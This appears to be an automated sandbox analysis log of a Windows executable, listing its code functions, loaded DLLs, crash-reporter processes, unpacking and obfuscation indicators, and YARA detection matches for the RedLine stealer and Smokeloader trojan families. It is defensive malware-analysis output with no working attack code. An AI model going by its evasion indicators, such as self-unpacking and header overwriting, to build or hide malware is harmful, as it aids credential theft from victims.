                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_004340980_2_00434098
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0043D0A00_2_0043D0A0
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_004180A90_2_004180A9
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0040A9400_2_0040A940
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0041714B0_2_0041714B
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0040C9170_2_0040C917
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0042B12C0_2_0042B12C
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0042F1300_2_0042F130
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0042B1C00_2_0042B1C0
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0041D9E00_2_0041D9E0
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_004361E00_2_004361E0
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_004111E50_2_004111E5
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_004059F00_2_004059F0
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_004239F20_2_004239F2
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0043C1F00_2_0043C1F0
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0040F9FD0_2_0040F9FD
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_004259900_2_00425990
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0043B9A10_2_0043B9A1
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_004062500_2_00406250
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0041D2700_2_0041D270
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_00424A740_2_00424A74
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_004092300_2_00409230
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_00423A340_2_00423A34
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_004192DA0_2_004192DA
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0043D2F00_2_0043D2F0
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0043C2800_2_0043C280
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_004152980_2_00415298
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_004082AE0_2_004082AE
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_004252BA0_2_004252BA
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0041CB050_2_0041CB05
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_00428BC00_2_00428BC0
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_004143C20_2_004143C2
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_00402BD00_2_00402BD0
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_00428BE90_2_00428BE9
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_004373990_2_00437399
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_004393A00_2_004393A0
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_00416BA50_2_00416BA5
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_004293AA0_2_004293AA
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_004223B80_2_004223B8
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_00436C000_2_00436C00
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_004234100_2_00423410
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0042B4FC0_2_0042B4FC
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_00404CB00_2_00404CB0
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_004074B00_2_004074B0
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0041DD500_2_0041DD50
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_004185780_2_00418578
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0042D57E0_2_0042D57E
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_004245020_2_00424502
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_00421D100_2_00421D10
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0040DD250_2_0040DD25
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0041D5E00_2_0041D5E0
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_004175820_2_00417582
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0043D5800_2_0043D580
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_00427DA20_2_00427DA2
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_004205B00_2_004205B0
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0042C64A0_2_0042C64A
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_00426E500_2_00426E50
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0042B4F70_2_0042B4F7
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0043462A0_2_0043462A
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_004356300_2_00435630
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_004066E00_2_004066E0
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0042C6E40_2_0042C6E4
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_00430EF00_2_00430EF0
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_004256F90_2_004256F9
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_00422E930_2_00422E93
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_00425E900_2_00425E90
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_004156A00_2_004156A0
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0041BEA00_2_0041BEA0
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_00438EA00_2_00438EA0
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_00435EA00_2_00435EA0
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_00405EB00_2_00405EB0
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0041C6BB0_2_0041C6BB
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_00415F660_2_00415F66
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_004197700_2_00419770
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_004097000_2_00409700
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0042C7260_2_0042C726
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0042C7350_2_0042C735
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0041DF800_2_0041DF80
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_00402FA00_2_00402FA0
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_007680090_2_00768009
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0074C0E80_2_0074C0E8
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_007711570_2_00771157
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_007461170_2_00746117
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_007791070_2_00779107
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_007761070_2_00776107
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_007681080_2_00768108
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0075E1E70_2_0075E1E7
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0075C1AC0_2_0075C1AC
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_007432070_2_00743207
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_007742FF0_2_007742FF
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0077B2CF0_2_0077B2CF
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_007613470_2_00761347
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0075F3470_2_0075F347
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0075B3480_2_0075B348
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0075734A0_2_0075734A
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0077D3070_2_0077D307
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_007483C70_2_007483C7
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_007573B20_2_007573B2
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0076F3970_2_0076F397
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0076B3930_2_0076B393
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_007764470_2_00776447
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0075144C0_2_0075144C
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0076B4270_2_0076B427
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0075D4D70_2_0075D4D7
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_007464B70_2_007464B7
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_007494970_2_00749497
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0077D5570_2_0077D557
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_007595410_2_00759541
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0075C5280_2_0075C528
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_007445D70_2_007445D7
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_007696110_2_00769611
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_007796070_2_00779607
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0076B7630_2_0076B763
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_007477170_2_00747717
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0077D7E70_2_0077D7E7
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0076D7E50_2_0076D7E5
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_007587DF0_2_007587DF
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0076B75E0_2_0076B75E
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0075D8470_2_0075D847
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_007608170_2_00760817
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0076C8B10_2_0076C8B1
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_007758970_2_00775897
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_007748910_2_00774891
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_007499670_2_00749967
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_007469470_2_00746947
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0076C94B0_2_0076C94B
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0075C9210_2_0075C921
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_007489F70_2_007489F7
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_007599D70_2_007599D7
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0076C99C0_2_0076C99C
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0076C98D0_2_0076C98D
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_00775AF70_2_00775AF7
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_00779A970_2_00779A97
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0077DA970_2_0077DA97
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0074CB7E0_2_0074CB7E
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_00765BF70_2_00765BF7
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_00757BA70_2_00757BA7
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0074ABA70_2_0074ABA7
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0074FC640_2_0074FC64
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_00745C570_2_00745C57
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0075DC470_2_0075DC47
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_00743C270_2_00743C27
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0077BC080_2_0077BC08
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_00764CF40_2_00764CF4
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_00763C9B0_2_00763C9B
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_00776E670_2_00776E67
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_00742E370_2_00742E37
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_00761F770_2_00761F77
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_00758F350_2_00758F35
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_00744F170_2_00744F17
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0075DFB70_2_0075DFB7
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0074DF8C0_2_0074DF8C
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: String function: 007481D7 appears 78 times
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: String function: 00414060 appears 74 times
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: String function: 00407F70 appears 46 times
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: String function: 007542C7 appears 74 times
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 1004
                  Source: SkaKk8Z1J0.exe, 00000000.00000002.1724893368.0000000000456000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesOdilemio@ vs SkaKk8Z1J0.exe
                  Source: SkaKk8Z1J0.exe, 00000000.00000000.1254720740.0000000000455000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesOdilemio@ vs SkaKk8Z1J0.exe
                  Source: SkaKk8Z1J0.exeBinary or memory string: OriginalFilenamesOdilemio@ vs SkaKk8Z1J0.exe
                  Source: SkaKk8Z1J0.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 00000000.00000002.1724928073.0000000000540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: SkaKk8Z1J0.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@3/9@10/3
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_005407A6 CreateToolhelp32Snapshot,Module32First,0_2_005407A6
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_004361E0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,0_2_004361E0
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4692
                  Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\061d3f83-f599-4c97-9791-e0a6f1ad5526Jump to behavior
                  Source: SkaKk8Z1J0.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: SkaKk8Z1J0.exeReversingLabs: Detection: 39%
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeFile read: C:\Users\user\Desktop\SkaKk8Z1J0.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\SkaKk8Z1J0.exe "C:\Users\user\Desktop\SkaKk8Z1J0.exe"
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 1004
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 1668
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                  Data Obfuscation

                  barindex
                  Detected unpacking (changes PE section rights)
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeUnpacked PE file: 0.2.SkaKk8Z1J0.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeUnpacked PE file: 0.2.SkaKk8Z1J0.exe.400000.0.unpack
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0041ACF6 push esp; iretd 0_2_0041ACFF
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0043F6EE push esp; iretd 0_2_0043F6EF
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0043BF00 push eax; mov dword ptr [esp], 49484716h0_2_0043BF01
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_005431F5 pushad ; ret 0_2_005431FA
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0054347B push ebp; ret 0_2_00543480
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0077C167 push eax; mov dword ptr [esp], 49484716h0_2_0077C168
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0077F555 push esp; iretd 0_2_0077F556
                  Source: C:\Users\user\Desktop\SkaKk8Z1J0.exeCode function: 0_2_0075AF5D push esp; iretd 0_2_0075AF66
                  Source: SkaKk8Z1J0.exeStatic PE information: section name: .text entropy: 7.693670532198294
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
